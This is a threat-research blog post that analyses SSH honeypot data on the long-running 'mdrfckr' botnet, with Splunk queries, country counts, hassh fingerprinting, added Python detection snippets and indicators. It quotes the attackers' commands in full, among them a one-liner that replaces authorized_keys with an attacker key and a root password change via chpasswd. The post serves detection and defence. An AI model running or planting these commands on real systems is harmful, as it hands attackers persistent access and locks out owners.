mdrfckrs – part one

The events described in this post take place through October and November 2022.

Preface

The string ‘mdrfckr’ might ring a bell. It has previously been observed in relation to the ‘dota’ malware family. As ‘dota.tar.gz’ and ‘dota3.tar.gz’ were only observed 66 and 33 times, respectively, out of 12913 observations related to the ‘mdrfckr’ string, this post does not focus on the dota files – the honeypot system does not even allow for the execution of the file.

The focus of this post is on the status of this botnet (going 5 years strong, as per this ubuntuforums.org post) and how to fingerprint it. Indicators can be found at the bottom of the post.

More information about the dota-family here:

https://blogs.juniper.net/en-us/threat-research/dota3-is-your-internet-of-things-device-moonlighting
https://www.countercraftsec.com/blog/dota3-malware-again-and-again/
https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/

Basis of the post

It’s time for the first chapter of the mdrfckr saga. This will serve as part one and covers how a botnet of at least ~13000 nodes operates, from initial access to how persistence is attempted, and how to use the botnet’s methodology to fingerprint it.

In late September of 2022 I set up a network of nodes with the sole purpose of collecting data from connections made to port 22 – good ol’ ssh. In total, 10 servers spread across the globe provide the foundation for the dataset. At the time of writing, a little over 57000 unique IPs have been visiting the servers.

For the first two months, October and November 2022, the data was simply observed coming in. Some slight tweaks were made to the system to automate it more, while grasping the functionality of Splunk. After multiple check-ins to see what kind of data came in, one mouthful of a string kept appearing:

cd ~ && rm -rf .ssh && mkdir .ssh && echo
"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7V
vAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0E
pZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgL
Muakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmP
ecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGP
K5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWY
YjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"
>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

The quoted string is a public key used to log in via ssh, in place of a password, on any system that lists it in authorized_keys.

Deconstructing this string translates to:

  1. Changing directory to the current user’s home directory.
  2. Forcefully and recursively removing the hidden folder named ‘.ssh’, before creating it again.
  3. Echo the string ‘ssh-rsa AAAAB3Nza[…]oRw== mdrfckr’ into the ‘authorized_keys’ file. Note the ‘mdrfckr’ comment associated with the key.
  4. Recursively changing the permissions of the newly created ‘.ssh’ directory so that ‘go’ (group and others) have no permissions at all (=), before changing directory back to the current user’s home directory. This ensures that only the user can access the directory, not group members or others, which is also what sshd requires before it will honour the key.

At first, a Splunk query for just the string ‘mdrfckr’ will be executed to get a grasp of how big the scale is, as well as seeing what other things might be found within the same session as the string.

mdrfckr
| timechart span=1d count

Which yields:

The string ‘mdrfckr’ is observed up to 12795 times a day, and as low as 866 times a day during the two month period.

All observations could in theory be done by a single IP using this query, so to get a better grasp of how many mdrfckrs are out there, further filtering and analysis is required.

mdrfckr
| dedup src_ip
| timechart span=1d count

By adding ‘dedup src_ip’, short for de-duplicate, only unique IPs per timespan are included. Currently, a timespan of 1 day is used. This yields:

The two charts do not appear to have much correlation until the latter part of November. As mentioned, though, this chart filters by day. A query without the chart reveals that a total of 12913 unique IP addresses have executed a command that includes ‘mdrfckr’ in the two month period.

Nearly 13000 unique IPs within a two month period warrants further investigation.

Mapping it out

mdrfckr
| dedup src_ip 
| iplocation src_ip 
| stats count by Country 
| geom geo_countries featureIdField="Country"

The ‘iplocation’ command maps an IPv4/IPv6 address to a country, while ‘geom’ adds further data, in the form of geographic data structures, to the result, assisting in the creation of the choropleth map seen below. The ‘featureIdField="Country"’ argument defines that we want countries marked.

A total of 152 countries have been observed – the top 10 countries can be seen in the table below:

Country          Count     %
United States     2762  21.4
Singapore         1169   9.06
India              834   6.46
Germany            833   6.45
Brazil             687   5.32
Hong Kong          489   3.79
Russia             485   3.76
China              447   3.46
Indonesia          437   3.39
South Korea        428   3.32
Other             4342  33.59
Total            12913 100

It is observed that most mdrfckrs are coming from the US – a little over one in five. Traffic does not come from one, or few, specific countries of origin. This activity is seen worldwide.

Further investigation

The first observed session that included the string ‘mdrfckr’ was seen on 2022-10-01T00:00:58 UTC and was observed on a node in Helsinki, Finland. It came from AWS.

session: e747bfa676be
client: SSH-2.0-libssh-0.6.3
hassh: 51cba57125523ce4b9db67714a90bf6e
user: root
password: 123@
duration: 15.8 sec

During the session, a total of 15 unique commands were observed. The number of times each command was observed in the same time period is noted as well; this count is taken over the whole index, not only sessions in which ‘mdrfckr’ was observed.

The number of times the commands are observed within the timeframe is checked to potentially correlate the commands to mdrfckrs, or to see whether they are generally used commands that other parties run as well.

If the observed number is in the same ballpark as the amount of observed unique IPs, 12913, a strong correlation can be made.

An overview can be seen below, one command per line, in the order in which they were run: the command, then its example output, then in brackets the count and the diff against the 12913 unique IPs.

Command → Example output [Count, Diff]

  1. cat /proc/cpuinfo | grep name | wc -l → 4 [13002, +0.68%]
  2. echo "root:*"|chpasswd|bash → (no output) [11926, -7.65%]
  3. cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' → Intel(R) Celeron(R) CPU J3455 @ 1.50GHz [12981, +0.53%]
  4. free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' → 7795 4219 607 1 2968 3256 [12982, +0.53%]
  5. ls -lh $(which ls) → -rwxr-xr-x 1 root root 135K Feb 7 2022 /usr/bin/ls [12982, +0.53%]
  6. which ls → /usr/bin/ls [12983, +0.54%]
  7. crontab -l → shows cronjobs [12979, +0.51%]
  8. w → 14:48:27 up 13 days, 20:12, 6 users, load average: 0.16, 0.38, 0.50 / USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT / user pts/0 x.x.x.x 11Feb23 3:48m 0.06s 0.01s command-run [13059, +1.13%]
  9. uname -m → x86_64 [12982, +0.53%]
  10. cat /proc/cpuinfo | grep model | grep name | wc -l → 4 [12976, +0.49%]
  11. top → shows top gui [12991, +0.60%]
  12. uname → Linux [13854, +7.29%]
  13. uname -a → Linux hostname 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux [13712, +6.19%]
  14. lscpu | grep Model → Model name: Intel(R) Celeron(R) CPU J3455 @ 1.50GHz / Model: 92 [12965, -0.40%]

… followed by the ‘mdrfckr’ command as the 15th. The commands listed were run in the order in which they are written.

Note: The password is unique per session. If the query uses a wildcard instead of the observed password from that specific session, the observation is 11926 (diff -987/7.65%) instead.

Example: $ echo "root:password"|chpasswd|bash

It is observed that the more common commands, such as ‘uname’ with and without the ‘-a’ switch, produce larger differences than commands with multiple pipes or more uncommon switches do. As such, the more specific a command from the table is, the more likely it is to be associated with a mdrfckr.

Most commands stay between -0.40 and +0.68 percentage points of the number of unique IPs observed with the mdrfckr-string. Thus, these commands are closely associated with the mdrfckrs and a strong correlation can be made.
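The correlation above can be turned into a session-level check: score a session higher the more of the specific (multi-pipe, unusual-switch) recon commands it contains, and treat the authorized_keys overwrite with the ‘mdrfckr’ key comment as confirmation. This is an added example, not code from the post; the session records are constructed and the key body is elided.

```python
import re

# Recon commands from the table that stayed within about +-0.7 percentage points of
# the 12913 mdrfckr IPs: specific enough (pipes, unusual switches) to be strong indicators.
SPECIFIC_RECON = [
    "cat /proc/cpuinfo | grep name | wc -l",
    "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
    "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
    "ls -lh $(which ls)",
    "cat /proc/cpuinfo | grep model | grep name | wc -l",
    "lscpu | grep Model",
]
# Persistence step: wipe ~/.ssh and rewrite authorized_keys; the key comment is 'mdrfckr'.
PERSIST_RE = re.compile(r"rm -rf \.ssh .*authorized_keys", re.S)
KEY_COMMENT = "mdrfckr"

def _norm(cmd):
    """Collapse whitespace so small logging differences do not break the match."""
    return " ".join(cmd.split())

def score_session(commands):
    """Return (score, hits) for one SSH session's command list.
    2 = persistence line with the mdrfckr key comment seen (confirmed);
    1 = at least three of the specific recon commands seen, no key (suspicious);
    0 = nothing specific (generic commands such as 'uname' alone do not count)."""
    joined = "\n".join(_norm(c) for c in commands)
    hits = [c for c in SPECIFIC_RECON if _norm(c) in joined]
    persist = bool(PERSIST_RE.search(joined)) and KEY_COMMENT in joined
    if persist:
        return 2, hits + ["authorized_keys overwrite (" + KEY_COMMENT + ")"]
    if len(hits) >= 3:
        return 1, hits
    return 0, hits

# Constructed sessions: the observed 15-command sequence (key body elided) and an
# ordinary admin session that only uses the common commands from the table.
BOT_SESSION = [
    "cat /proc/cpuinfo | grep name | wc -l",
    'echo "root:PLACEHOLDER"|chpasswd|bash',
    "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
    "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
    "ls -lh $(which ls)", "which ls", "crontab -l", "w", "uname -m",
    "cat /proc/cpuinfo | grep model | grep name | wc -l", "top", "uname", "uname -a",
    "lscpu | grep Model",
    'cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAA[...] mdrfckr" '
    ">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
]
ADMIN_SESSION = ["uname -a", "w", "crontab -l", "top"]
```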

By now the recon part has concluded and the mdrfckr ssh key has replaced any other key inside the authorized_keys file. This is done to remove access for the currently allowed users and to ensure persistence. The created authorized_keys file is known to VirusTotal, where it was first observed on 2018-07-05 17:21:41 UTC. A quick search reveals that this hash is well known.

mdrfckr fingerprints

To further verify that all 12913 unique IPs observed are associated with each other and to provide more evidence alongside the observed commands run, the unique ‘hassh’ value of the observed clients can be checked.

‘hassh’ is a fingerprinting method developed by Salesforce. It profiles an ssh client by examining the key exchange initialisation message (‘SSH_MSG_KEXINIT’, which is sent in plaintext) that client and server exchange when establishing the connection. The set of algorithms a client offers (key exchange, cipher, MAC and compression) and the order it lists them in are distinctive enough to be fingerprinted. A ‘hassh’ value is an MD5 hash of those lists. A list of hassh values and the associated client banners observed can be found on github.

First, we check the hassh value from the previously mentioned session:

session: e747bfa676be
client: SSH-2.0-libssh-0.6.3
hassh: 51cba57125523ce4b9db67714a90bf6e

The client announces it is SSH-2.0-libssh-0.6.3, which corresponds to a hassh of 51cba57125523ce4b9db67714a90bf6e. Interestingly, this hassh matches the client SSH-2.0-libssh-0.6.0 as well. This means that the variables being fingerprinted did not change from version 0.6.0 to version 0.6.3.

As we cannot fully trust that the client name is correct, we rely on the hassh value. A search for the hassh is done alongside a de-duplication of source IPs.

This number is close to the original starting point of 12913 unique IPs: a difference of 129, or 0.9%. Based on this dataset, the conclusion is that there is a 99.1% risk of dealing with a ‘mdrfckr’ whenever the hassh 51cba57125523ce4b9db67714a90bf6e is observed.
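The hassh computation described above, together with the dedup-by-source-IP comparison that the last two sections perform in Splunk, as an added example (not code from the post). The algorithm lists below are constructed for illustration and are not the real libssh 0.6.x lists, so the resulting hash will not equal 51cba57125523ce4b9db67714a90bf6e.

```python
import hashlib

def hassh(kex, enc, mac, comp):
    """hassh = MD5 over the client's KEXINIT name-lists (kex; enc c2s; mac c2s; comp c2s):
    each list comma-joined, the four lists ';'-joined. Same lists in the same order give
    the same hash, which is why libssh 0.6.0 and 0.6.3 collide in the post."""
    algs = ";".join(",".join(lst) for lst in (kex, enc, mac, comp))
    return hashlib.md5(algs.encode()).hexdigest()

def correlate(sessions, target_hassh, marker="mdrfckr"):
    """Mirror of the Splunk reasoning: dedup by src_ip, then compare the set of IPs that
    presented target_hassh with the set whose commands contained the marker string.
    'precision' is the share of target-hassh IPs that also ran the marker command."""
    by_hassh, by_marker = set(), set()
    for s in sessions:
        if s["hassh"] == target_hassh:
            by_hassh.add(s["src_ip"])
        if any(marker in c for c in s["commands"]):
            by_marker.add(s["src_ip"])
    both = by_hassh & by_marker
    precision = len(both) / len(by_hassh) if by_hassh else 0.0
    return {"hassh_ips": len(by_hassh), "marker_ips": len(by_marker),
            "both": len(both), "precision": precision}

# Constructed client algorithm lists (assumption, not the real libssh 0.6.x offer).
BOT_CLIENT = hassh(["diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"],
                   ["aes256-ctr", "aes128-ctr"], ["hmac-sha1"], ["none"])
OTHER_CLIENT = hassh(["curve25519-sha256", "diffie-hellman-group14-sha1"],
                     ["aes256-ctr", "aes128-ctr"], ["hmac-sha1"], ["none"])
PERSIST = 'cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAA[...] mdrfckr" >>.ssh/authorized_keys'

# Constructed honeypot records (documentation IP ranges); one IP appears twice so the
# dedup step is visible in the counts.
SESSIONS = [
    {"src_ip": "198.51.100.7", "hassh": BOT_CLIENT, "commands": ["uname -a", PERSIST]},
    {"src_ip": "198.51.100.7", "hassh": BOT_CLIENT, "commands": ["uname -a", PERSIST]},
    {"src_ip": "203.0.113.9", "hassh": BOT_CLIENT, "commands": ["which ls", PERSIST]},
    {"src_ip": "203.0.113.10", "hassh": BOT_CLIENT, "commands": ["uname"]},
    {"src_ip": "192.0.2.4", "hassh": OTHER_CLIENT, "commands": ["ls -la"]},
]
RESULT = correlate(SESSIONS, BOT_CLIENT)
```

On the post's own data the same comparison gives the 0.9% gap between hassh-matched and marker-matched IPs; here the constructed sample yields 3 hassh IPs, of which 2 also ran the persistence line.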

Part two is next. It will cover how the botnet changed tactics in December 2022, specifically a new ssh client and a change in the ‘mdrfckr’ string.

References

https://www.virustotal.com/gui/file/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2/details
https://blogs.juniper.net/en-us/threat-research/dota3-is-your-internet-of-things-device-moonlighting
https://www.countercraftsec.com/blog/dota3-malware-again-and-again/
https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/

Indicators

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
authorized_keys  a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 
SSH-2.0-libssh-0.6.3 / SSH-2.0-libssh-0.6.0  51cba57125523ce4b9db67714a90bf6e